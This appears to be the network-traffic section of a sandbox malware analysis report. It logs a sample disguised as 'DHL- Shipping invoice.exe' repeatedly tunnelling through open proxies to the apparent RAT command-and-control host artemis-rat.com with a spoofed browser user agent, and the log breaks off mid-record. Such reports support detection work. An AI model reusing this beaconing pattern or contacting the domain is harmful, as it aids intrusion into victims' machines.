                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Cache Access Denied</title><style type="text/css">... /* * Copyright (C) 1996-2019 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efe


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1487192.168.2.454439190.96.97.20241536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.529797077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1488192.168.2.45443294.131.14.6610816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.529931068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1489192.168.2.449754164.92.86.113573916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.530097961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.563242912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.563158989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.562717915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:29.562550068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:41.564356089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:53.563110113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:17.562340021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1490192.168.2.454353153.99.63.14380006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.530152082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1491192.168.2.454347103.118.46.17480806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.533122063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.888632059 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1492192.168.2.4543788.217.95.4488996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.534069061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1493192.168.2.454454149.62.244.2741536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.545774937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1494192.168.2.454368103.166.141.74200746484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.554534912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1495192.168.2.454379198.44.255.3806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.564784050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1496192.168.2.45446537.27.32.80806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.565078974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1497192.168.2.453890162.241.50.179340996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.567020893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.683605909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.750087023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.750710011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:29.749808073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:53.765372992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:41.765449047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1498192.168.2.453937162.241.46.6622446484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.567291975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1499192.168.2.454374103.156.232.8931256484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.570743084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1500192.168.2.454552104.21.31.189806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.572776079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.660368919 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1501192.168.2.45333645.195.149.7910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.575700998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1502192.168.2.45450713.37.89.20131286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.577344894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.739361048 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1503192.168.2.45439047.74.152.2988886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.582124949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.359369993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.693608999 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.20.1
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1504192.168.2.454367222.220.102.15980006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.586422920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.359381914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.562685013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1505192.168.2.45454838.162.21.3831286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.590110064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.890697002 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1506192.168.2.4544318.213.128.908086484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.602066040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.447278023 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:10.444606066 CET44INHTTP/1.1 200 OK
                            Content-Type: text/html


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1507192.168.2.454594104.16.106.154806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.609458923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.697032928 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1508192.168.2.454602104.27.26.29806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.609555006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.697436094 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1509192.168.2.45383982.210.56.251806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.625193119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.683862925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.750124931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.746750116 CET725INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:14 GMT
                            Server: Apache/2.4.54 (Debian)
                            Content-Length: 533
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 65 72 67 65 2e 6d 6f 72 61 6e 64 40 66 72 65 65 2e 66 72 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at serge.morand@free.fr to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1510192.168.2.454456133.18.234.13806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.625276089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.218924999 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                            Content-Type: text/html
                            Connection: close
                            Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                            Data Ascii: Backend not available


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1511192.168.2.454471114.129.2.8280816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.630105019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
